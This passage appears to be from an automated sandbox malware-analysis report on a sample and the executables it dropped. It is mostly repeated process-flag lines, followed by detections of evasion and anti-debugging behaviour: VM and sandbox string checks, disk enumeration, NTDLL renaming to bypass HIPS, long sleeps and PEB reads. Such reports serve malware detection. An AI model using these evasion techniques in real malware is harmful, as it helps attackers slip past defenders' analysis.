Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: B82B.exe PID: 1936, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 25Kf6vSBoq.exe, 00000002.00000002.311871720.000000000044A000.00000004.00000020.sdmp Binary or memory string: ASWHOOK
Source: B82B.exe, 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
Source: B82B.exe, 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLUSER
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Renames NTDLL to bypass HIPS
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe File opened: C:\Windows\SysWOW64\ntdll.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe File opened: C:\Windows\SysWOW64\ntdll.dll Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe TID: 648 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\EA8A.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 557 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9C1A.exe Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A946B90 rdtsc 22_2_6A946B90
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000004.00000000.304505537.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000004.00000000.304505537.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: B82B.exe, 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmp Binary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: B82B.exe, 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmp Binary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000004.00000000.291035195.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: B82B.exe, 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmp Binary or memory string: vmware
Source: B82B.exe, 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmp Binary or memory string: VMwareVBoxARun using valid operating system
Source: explorer.exe, 00000004.00000000.291035195.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000004.00000000.285419513.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.304691629.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000004.00000000.291035195.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000004.00000000.304691629.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.288779454.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: B82B.exe, 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmp Binary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
Source: B82B.exe, 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: B82B.exe, 00000014.00000003.501647744.000000000666B000.00000004.00000001.sdmp Binary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
Source: C1B2.exe, 00000015.00000002.614812023.000000000156F000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_004040F0 RegCreateKeyExA,RegOpenKeyExA,GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetSystemMetrics, 29_2_004040F0
Source: C:\Users\user\AppData\Local\Temp\DF9C.exe Code function: 29_2_0041B9B2 FindFirstFileExW, 29_2_0041B9B2
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging:

barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F4BC.exe System information queried: CodeIntegrityInformation
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Code function: 1_2_00427060 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_00427060
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\25Kf6vSBoq.exe Code function: 1_2_02E6D3E4 push dword ptr fs:[00000030h] 1_2_02E6D3E4
Source: C:\Users\user\AppData\Local\Temp\6EC5.exe Code function: 13_2_02C30042 push dword ptr fs:[00000030h] 13_2_02C30042
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94D294 mov eax, dword ptr fs:[00000030h] 22_2_6A94D294
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94D294 mov eax, dword ptr fs:[00000030h] 22_2_6A94D294
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94DA88 mov eax, dword ptr fs:[00000030h] 22_2_6A94DA88
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94DA88 mov eax, dword ptr fs:[00000030h] 22_2_6A94DA88
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9412BD mov esi, dword ptr fs:[00000030h] 22_2_6A9412BD
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9412BD mov eax, dword ptr fs:[00000030h] 22_2_6A9412BD
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9412BD mov eax, dword ptr fs:[00000030h] 22_2_6A9412BD
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A911AA0 mov eax, dword ptr fs:[00000030h] 22_2_6A911AA0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A945AA0 mov eax, dword ptr fs:[00000030h] 22_2_6A945AA0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A945AA0 mov eax, dword ptr fs:[00000030h] 22_2_6A945AA0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9152A5 mov eax, dword ptr fs:[00000030h] 22_2_6A9152A5
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9152A5 mov eax, dword ptr fs:[00000030h] 22_2_6A9152A5
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9152A5 mov eax, dword ptr fs:[00000030h] 22_2_6A9152A5
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9152A5 mov eax, dword ptr fs:[00000030h] 22_2_6A9152A5
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9152A5 mov eax, dword ptr fs:[00000030h] 22_2_6A9152A5
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8ADD mov eax, dword ptr fs:[00000030h] 22_2_6A9E8ADD
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A915AC0 mov eax, dword ptr fs:[00000030h] 22_2_6A915AC0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A915AC0 mov eax, dword ptr fs:[00000030h] 22_2_6A915AC0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A915AC0 mov eax, dword ptr fs:[00000030h] 22_2_6A915AC0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A913ACA mov eax, dword ptr fs:[00000030h] 22_2_6A913ACA
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A942ACB mov eax, dword ptr fs:[00000030h] 22_2_6A942ACB
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A942AE4 mov eax, dword ptr fs:[00000030h] 22_2_6A942AE4
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 22_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 22_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 22_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 22_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 22_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 22_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 22_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 22_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 22_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 22_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 22_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 22_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 22_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D4AEF mov eax, dword ptr fs:[00000030h] 22_2_6A9D4AEF
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A915210 mov eax, dword ptr fs:[00000030h] 22_2_6A915210
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A915210 mov ecx, dword ptr fs:[00000030h] 22_2_6A915210
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A915210 mov eax, dword ptr fs:[00000030h] 22_2_6A915210
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A915210 mov eax, dword ptr fs:[00000030h] 22_2_6A915210
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A933A1C mov eax, dword ptr fs:[00000030h] 22_2_6A933A1C
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A928A0A mov eax, dword ptr fs:[00000030h] 22_2_6A928A0A
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A918239 mov eax, dword ptr fs:[00000030h] 22_2_6A918239
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A918239 mov eax, dword ptr fs:[00000030h] 22_2_6A918239
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A918239 mov eax, dword ptr fs:[00000030h] 22_2_6A918239
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A914A20 mov eax, dword ptr fs:[00000030h] 22_2_6A914A20
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A914A20 mov eax, dword ptr fs:[00000030h] 22_2_6A914A20
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A99EA20 mov eax, dword ptr fs:[00000030h] 22_2_6A99EA20
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93A229 mov eax, dword ptr fs:[00000030h] 22_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93A229 mov eax, dword ptr fs:[00000030h] 22_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93A229 mov eax, dword ptr fs:[00000030h] 22_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93A229 mov eax, dword ptr fs:[00000030h] 22_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93A229 mov eax, dword ptr fs:[00000030h] 22_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93A229 mov eax, dword ptr fs:[00000030h] 22_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93A229 mov eax, dword ptr fs:[00000030h] 22_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93A229 mov eax, dword ptr fs:[00000030h] 22_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93A229 mov eax, dword ptr fs:[00000030h] 22_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A4257 mov eax, dword ptr fs:[00000030h] 22_2_6A9A4257
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A912240 mov ecx, dword ptr fs:[00000030h] 22_2_6A912240
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A912240 mov eax, dword ptr fs:[00000030h] 22_2_6A912240
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A919240 mov eax, dword ptr fs:[00000030h] 22_2_6A919240
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A919240 mov eax, dword ptr fs:[00000030h] 22_2_6A919240
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A919240 mov eax, dword ptr fs:[00000030h] 22_2_6A919240
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A919240 mov eax, dword ptr fs:[00000030h] 22_2_6A919240
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A4248 mov eax, dword ptr fs:[00000030h] 22_2_6A9A4248
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95927A mov eax, dword ptr fs:[00000030h] 22_2_6A95927A
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9CB260 mov eax, dword ptr fs:[00000030h] 22_2_6A9CB260
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9CB260 mov eax, dword ptr fs:[00000030h] 22_2_6A9CB260
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8A62 mov eax, dword ptr fs:[00000030h] 22_2_6A9E8A62
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A914B94 mov edi, dword ptr fs:[00000030h] 22_2_6A914B94
